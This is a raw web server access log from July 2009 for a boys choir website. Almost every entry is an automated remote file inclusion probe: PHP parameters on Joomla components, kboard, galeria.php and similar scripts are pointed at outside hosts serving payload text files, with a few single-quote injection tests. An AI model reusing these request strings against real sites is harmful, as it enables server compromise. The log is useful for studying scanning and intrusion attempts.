89.223.3.98 - - [04/Jul/2009:05:29:51 -0700] "GET /logs/access_090626.log/phphtml.php?htmlclass_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.236.242.164 - - [04/Jul/2009:05:30:24 -0700] "GET /logs/access_090622.log/kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.americanboyschoir.com"
62.58.32.74 - - [04/Jul/2009:05:30:52 -0700] "GET /logs/access_090414.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
62.58.32.74 - - [04/Jul/2009:05:30:53 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
62.58.32.74 - - [04/Jul/2009:05:30:53 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
62.58.32.74 - - [04/Jul/2009:05:36:15 -0700] "GET /logs/access_090409.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
216.117.128.143 - - [04/Jul/2009:05:38:54 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.117.128.143 - - [04/Jul/2009:05:38:54 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.117.128.143 - - [04/Jul/2009:05:38:54 -0700] "GET /logs/access_090612.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.49.99.7 - - [04/Jul/2009:05:39:11 -0700] "GET /logs/access_090622.log/kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.americanboyschoir.com"
216.117.128.143 - - [04/Jul/2009:05:39:18 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:05:43:17 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:05:43:17 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:05:43:17 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:05:43:30 -0700] "GET /logs/access_090414.log%20%20//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:05:43:58 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:05:43:58 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:05:43:58 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:05:44:07 -0700] "GET /logs/access_090414.log%20%20//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:05:44:15 -0700] "GET /logs/access_090622.log/convert/mvcw.php?vwar_root=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
64.191.102.117 - - [04/Jul/2009:05:44:16 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.americanboyschoir.com"
64.191.102.117 - - [04/Jul/2009:05:44:16 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.americanboyschoir.com"
62.58.32.74 - - [04/Jul/2009:05:44:19 -0700] "GET /logs/access_090603.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:05:44:58 -0700] "GET /logs/access_090626.log/convert/mvcw.php?vwar_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:05:45:09 -0700] "GET /logs/access_090629.log/convert/mvcw.php?vwar_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.30.79.34 - - [04/Jul/2009:05:45:12 -0700] "GET /xxxxxxxxx/?N=D HTTP/1.0" 200 516 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:05:45:19 -0700] "GET /logs/access_090629.log/convert/mvcw.php?vwar_root=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:05:46:31 -0700] "GET /logs/access_090626.log/convert/mvcw.php?vwar_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.109.103.174 - - [04/Jul/2009:05:47:52 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:05:48:23 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.70.32.2 - - [04/Jul/2009:05:49:37 -0700] "GET /logs/access_090612.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.70.32.2 - - [04/Jul/2009:05:49:37 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.70.32.2 - - [04/Jul/2009:05:49:37 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.70.32.2 - - [04/Jul/2009:05:50:15 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.117.128.143 - - [04/Jul/2009:05:53:42 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:05:56:10 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:05:56:10 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:05:56:11 -0700] "GET /logs/access_090626.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:05:56:31 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:05:56:32 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:05:56:32 -0700] "GET /logs/access_090626.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:05:57:07 -0700] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:05:57:16 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.109.103.174 - - [04/Jul/2009:05:57:47 -0700] "GET /logs/access_090528.log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
210.109.103.174 - - [04/Jul/2009:05:57:47 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
210.109.103.174 - - [04/Jul/2009:05:57:47 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
210.109.103.174 - - [04/Jul/2009:05:58:41 -0700] "GET /logs/access_090414.log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
217.70.32.2 - - [04/Jul/2009:05:59:58 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:06:00:11 -0700] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:06:00:11 -0700] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:06:00:11 -0700] "GET /phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:06:00:11 -0700] "GET /phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:06:00:12 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:06:00:12 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:06:01:25 -0700] "GET /logs/access_090626.log/phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:06:01:54 -0700] "GET /logs/access_090626.log/phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.201.230.140 - - [04/Jul/2009:06:03:50 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://fd.axl-jp.net//assets/export/_MD.TXT??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.americanboyschoir.com"
213.201.230.140 - - [04/Jul/2009:06:03:53 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://fd.axl-jp.net//assets/export/_MD.TXT??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.americanboyschoir.com"
201.232.54.48 - - [04/Jul/2009:06:07:59 -0700] "GET /logs/access_090603.log%20%20/index.php?redir=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.232.54.48 - - [04/Jul/2009:06:08:45 -0700] "GET /logs/access_090414.log%20%20/index.php?redir=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.70.32.2 - - [04/Jul/2009:06:10:15 -0700] "GET /logs/access_090612.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.232.54.48 - - [04/Jul/2009:06:10:59 -0700] "GET /logs/access.log/index.php?redir=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.232.54.48 - - [04/Jul/2009:06:12:34 -0700] "GET /logs/access_090626.log//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.232.54.48 - - [04/Jul/2009:06:12:34 -0700] "GET /logs//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.232.54.48 - - [04/Jul/2009:06:12:34 -0700] "GET /logs/access_090528.log//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:13:03 -0700] "GET /logs//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:13:03 -0700] "GET /logs/access_090626.log//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:13:03 -0700] "GET /galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:13:03 -0700] "GET /galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:13:04 -0700] "GET /logs//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:13:04 -0700] "GET /logs/access_090626.log//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:13:05 -0700] "GET /logs/access_090528.log//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:13:05 -0700] "GET /galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:13:05 -0700] "GET /logs//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:13:05 -0700] "GET /logs/access_090626.log//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:13:06 -0700] "GET /logs/access_090528.log//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:13:08 -0700] "GET /logs/access_090528.log//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.205.57.2 - - [04/Jul/2009:06:13:14 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
216.117.128.143 - - [04/Jul/2009:06:14:28 -0700] "GET /logs/access_090612.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.232.54.48 - - [04/Jul/2009:06:14:40 -0700] "GET /logs/access_090626.log%20%20//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.232.54.48 - - [04/Jul/2009:06:14:40 -0700] "GET /logs/access_090528.log%20%20//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:16:08 -0700] "GET /logs/access_090528.log%20%20//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:16:08 -0700] "GET /logs/access_090626.log%20%20//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:16:10 -0700] "GET /logs/access_090528.log%20%20//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:16:10 -0700] "GET /logs/access_090626.log%20%20//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:16:21 -0700] "GET /logs/access_090528.log%20%20//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:16:22 -0700] "GET /logs/access_090626.log%20%20//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.146.231.194 - - [04/Jul/2009:06:17:11 -0700] "GET /index.php?option=com_custompages&cpage=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
87.230.9.68 - - [04/Jul/2009:06:19:17 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.americanboyschoir.com"
87.230.9.68 - - [04/Jul/2009:06:19:17 -0700] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.americanboyschoir.com"
87.230.9.68 - - [04/Jul/2009:06:19:18 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.americanboyschoir.com"
211.236.242.164 - - [04/Jul/2009:06:20:04 -0700] "GET /logs/access.log%22%20target=%22_blank/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.americanboyschoir.com"
211.236.242.164 - - [04/Jul/2009:06:20:04 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.americanboyschoir.com"
211.236.242.164 - - [04/Jul/2009:06:20:05 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.americanboyschoir.com"
69.94.80.27 - - [04/Jul/2009:06:21:45 -0700] "GET /logs/access_090626.log%20%20//?_zb_path=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
69.94.80.27 - - [04/Jul/2009:06:21:45 -0700] "GET /?_zb_path=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
69.94.80.27 - - [04/Jul/2009:06:21:45 -0700] "GET /logs//?_zb_path=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.americanboyschoir.com"
69.94.80.27 - - [04/Jul/2009:06:21:51 -0700] "GET /?_zb_path=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
69.94.80.27 - - [04/Jul/2009:06:21:51 -0700] "GET /logs/access_090626.log%20%20//?_zb_path=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
69.94.80.27 - - [04/Jul/2009:06:21:51 -0700] "GET /logs//?_zb_path=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.americanboyschoir.com"
94.23.2.21 - - [04/Jul/2009:06:23:23 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.americanboyschoir.com"
94.23.2.21 - - [04/Jul/2009:06:23:23 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:23:38 -0700] "GET /logs/access.log//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.49.99.7 - - [04/Jul/2009:06:24:16 -0700] "GET /logs/access.log%22%20target=%22_blank/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
211.49.99.7 - - [04/Jul/2009:06:24:16 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
211.49.99.7 - - [04/Jul/2009:06:24:16 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:06:24:52 -0700] "GET /logs/access.log//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
69.94.80.27 - - [04/Jul/2009:06:25:35 -0700] "GET /logs//?_zb_path=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.americanboyschoir.com"
